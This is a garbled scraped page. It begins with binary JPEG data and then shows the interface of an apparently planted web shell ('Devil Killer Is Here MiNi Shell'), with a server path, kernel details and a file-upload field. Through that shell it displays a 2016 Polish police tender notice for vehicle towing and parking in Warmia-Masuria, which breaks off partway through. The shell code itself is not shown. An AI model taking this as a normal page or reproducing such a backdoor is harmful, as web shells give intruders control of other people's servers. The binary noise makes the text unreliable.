JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160229/19957-N-2016.html

<p class="kh_header"><b>Olsztyn: Usługi holowania i parkowania pojazdów o dopuszczalnej masie całkowitej (DMC) nie przekraczającej 3,5 t i powyżej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby 12 jednostek Policji  garnizonu warmińsko - mazurskiego.</b><br>
<b>Numer ogłoszenia: 19957 - 2016; data zamieszczenia: 29.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Partyzantów 6/8, 10-521 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5225200, 5225760, faks 089 5225205.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warminsko-mazurska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi holowania i parkowania pojazdów o dopuszczalnej masie całkowitej (DMC) nie przekraczającej 3,5 t i powyżej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby 12 jednostek Policji  garnizonu warmińsko - mazurskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie kompleksowych usług całodobowego przemieszczania (holowania, przewozu) i parkowania na parkingach strzeżonych jednośladów, pojazdów o dopuszczalnej masie całkowitej (DMC) nie przekraczającej 3,5 t i powyżej 3,5 t, jak również pojazdów służbowych Policji oraz części składowych pojazdów (części), urządzeń i rzeczy na potrzeby jednostek Policji garnizonu warmińsko-mazurskiego.
2.Przedmiot zamówienia został podzielony na dwie część: część A - holowanie i parkowanie pojazdów o dopuszczalnej masie całkowitej nie przekraczającej 3,5 t i część B: holowanie i parkowanie pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t. Zamawiający dopuszcza składanie ofert na poszczególne zadania w ramach podziału na części:
Część A: 
Zadanie nr 1 - KPP Gołdap
Zadanie nr 2 - KPP Giżycko
Zadanie nr 3 - KPP Nowe Miasto Lubawskie 
Zadanie nr 4 - KPP Olecko 
Zadanie nr 5 -  KPP Szczytno 
Część B:
Zadanie nr 6 - KPP Działdowo 
Zadanie nr 7 - KMP Elbląg 
Zadanie nr 8 - KPP Ełk 
Zadanie nr 9 - KPP Giżycko
Zadanie nr 10 - KPP Olecko 
Zadanie nr 11 - KPP Ostróda
Zadanie nr 12 - KP Morąg
Zadanie nr 13 - KPP Pisz
Zadanie nr 14 - KP Orzysz
Zadanie nr 15 - KPP Szczytno
3.Zamawiający dopuszcza możliwość zastosowania prawa opcji poprzez wydłużenie okresu realizacji umowy do czasu pełnego wykorzystania kwoty przewidzianej w umowie na sfinansowanie zamówienia.
4.Zamawiający będzie realizował usługi, stanowiące przedmiot zamówienia w formie zamówień  cząstkowych, zgodnie z bieżącymi potrzebami Policji.
5.Przewidywany zakres usług z podziałem na części zamówienia (zadania) określony został w załączniku Nr 8 do SIWZ - Opis przedmiotu zamówienia. Określenie przez Zamawiającego ilości przewidywanych usług ma charakter szacunkowy i nie może być podstawą roszczeń ze strony Wykonawcy w razie mniejszej liczby zleceń w trakcie realizacji umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający uzna warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
2. Zamawiający uzna ww. warunek za spełniony, jeśli Wykonawca przedstawi licencję na wykonywanie transportu drogowego rzeczy, określoną w art. 5b ust. 2 ustawy z dnia 6 września 2001 r. o transporcie drogowym (tj. Dz. U. z 2013 r., poz. 1414 ze zm.);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. posiadania wiedzy i doświadczenia do realizacji przedmiotowego zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. dysponowania odpowiednim potencjałem technicznym. 
2.Zamawiający uzna ww. warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje parkingiem opisanym w Załączniku nr 8 do SIWZ pkt 7 i co najmniej jednym pojazdem niezbędnym do pełnej realizacji przedmiotu zamówienia, zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 31.12.2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2003 r,  poz. 262 ze zm.);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. dysponowania osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. sytuacji ekonomicznej i finansowej pozwalającej mu na realizację przedmiotowego zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, wówczas zobowiązani są załączyć do oferty, oprócz dokumentów wymienionych przez Zamawiającego, dokument wskazujący ustanowionego pełnomocnika (lidera) do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument ten musi być wystawiony zgodnie z wymogami ustawowymi, podpisany przez prawnie upoważnionych wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 76</li>
<li>2 - Odległość parkingu od siedziby danej jednostki Policji - 24</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość wprowadzenia następujących zmian do umowy o zamówienie publiczne, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:  
1)	w przypadku gdy niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego oraz konieczna w celu prawidłowego wykonania umowy,
2)	zmiany spowodowane wzrostem albo zmniejszeniem stawki VAT. Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia Wykonawcy o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę. Jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT zapłaconego przez Wykonawcę,
3)	zmiana wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 o minimalnym wynagrodzeniu za pracę,
4)	zmiana zasad podleganiu ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne,
5)	nastąpiła zmiana obowiązujących przepisów prawa mających wpływ na realizację przedmiotu zamówienia,
6)	Wykonawcę zaoferował lub wyraził zgodę na obniżenie ceny za realizację przedmiotu zamówienia.
2.Dopuszczalne zmiany postanowień zawartej umowy nie stanowią zobowiązania do wyrażenia na nie zgody zarówno przez Zamawiającego jak i przez Wykonawcę.
3.Zmiana umowy na wniosek Wykonawcy wymaga wykazania okoliczności uprawniających do dokonania tej zmiany.
4.Zmiany postanowień zawartej umowy wymagają, pod rygorem nieważności, zachowania formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.warminsko-mazurska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji w Olsztynie Sekcja Zamówień Publicznych i Funduszy Pomocowych ul. Partyzantów 6/8, pok.218, 10-521 Olsztyn..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2016 godzina 13:00, miejsce: Komenda Wojewódzka Policji w Olsztynie Sekcja Zamówień Publicznych i Funduszy Pomocowych ul. Partyzantów 6-8, 10-521 Olsztyn..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej nie przekraczającej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby KPP Gołdap.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-33 szt.
2.Kompleksowe wykonanie usługi do 5 km od miejsca zabezpieczenia (załadunku) pojazdu jednośladowego do miejsca parkowania, wskazanego przez Policję, 
w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-2 szt.
3.Stawka za 1 km holowania (przewożenia) pojazdu powyżej 5 km-33 szt.
Stawka za 1 km holowania (przewożenia) pojazdu jednośladowego powyżej 5 km-2 szt.
Przechowywanie/parkowanie pojazdu1 do 15 dni, stawka za dobę-	16 szt.
Przechowywanie/parkowanie pojazdu jednośladowego1 do 15 dni, stawka za dobę-2 szt.
Przechowywanie/parkowanie pojazdu1 powyżej 15 dni, stawka za dobę-	5 szt.
Przechowywanie/parkowanie pojazdu jednośladowego1 powyżej 15 dni, stawka za dobę-	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 76</li>
<li>2. Odległość parkingu od siedziby danej jednostki Policji - 24</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej nie przekraczającej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby KPP w Giżycku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kompleksowe wykonanie usługi do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-33 szt.
2. Kompleksowe wykonanie usługi do 5 km od miejsca zabezpieczenia (załadunku) pojazdu jednośladowego do miejsca parkowania, wskazanego przez Policję, 
w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-2 szt.
3. Stawka za 1 km holowania (przewożenia) pojazdu powyżej 5 km-34 szt.
4. Stawka za 1 km holowania (przewożenia) pojazdu jednośladowego powyżej 5 km-	1 szt.
5. Przechowywanie/parkowanie pojazdu1 do 15 dni, stawka za dobę-38 szt.
Przechowywanie/parkowanie pojazdu jednośladowego1 do 15 dni, stawka za dobę-2 szt.
6. Przechowywanie/parkowanie pojazdu1 powyżej 15 dni, stawka za dobę-5 szt.
7. Przechowywanie/parkowanie pojazdu jednośladowego1 powyżej 15 dni, stawka za dobę 	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 76</li>
<li>2. Odległość parkingu od siedziby danej jednostki Policji - 24</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej nie przekraczającej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby KPP w Nowym Mieście Lubawskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-28 szt.
2.Kompleksowe wykonanie usługi do 5 km od miejsca zabezpieczenia (załadunku) pojazdu jednośladowego do miejsca parkowania, wskazanego przez Policję, 
w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt -2 szt.
3.Stawka za 1 km holowania (przewożenia) pojazdu powyżej 5 km- 23 szt.
4.Stawka za 1 km holowania (przewożenia) pojazdu jednośladowego powyżej 5 km-2 szt.
5.Przechowywanie/parkowanie pojazdu1 do 15 dni, stawka za dobę- 28 szt.
6.Przechowywanie/parkowanie pojazdu jednośladowego1 do 15 dni, stawka za dobę -2 szt.
7.Przechowywanie/parkowanie pojazdu1 powyżej 15 dni, stawka za dobę- 6 szt.
8.Przechowywanie/parkowanie pojazdu jednośladowego1 powyżej 15 dni, stawka za dobę-	2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 76</li>
<li>2. Odległość parkingu od siedziby danej jednostki Policji - 24</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej nie przekraczającej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby KPP w Olecku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-20 szt.
2.Kompleksowe wykonanie usługi do 5 km od miejsca zabezpieczenia (załadunku) pojazdu jednośladowego do miejsca parkowania, wskazanego przez Policję, 
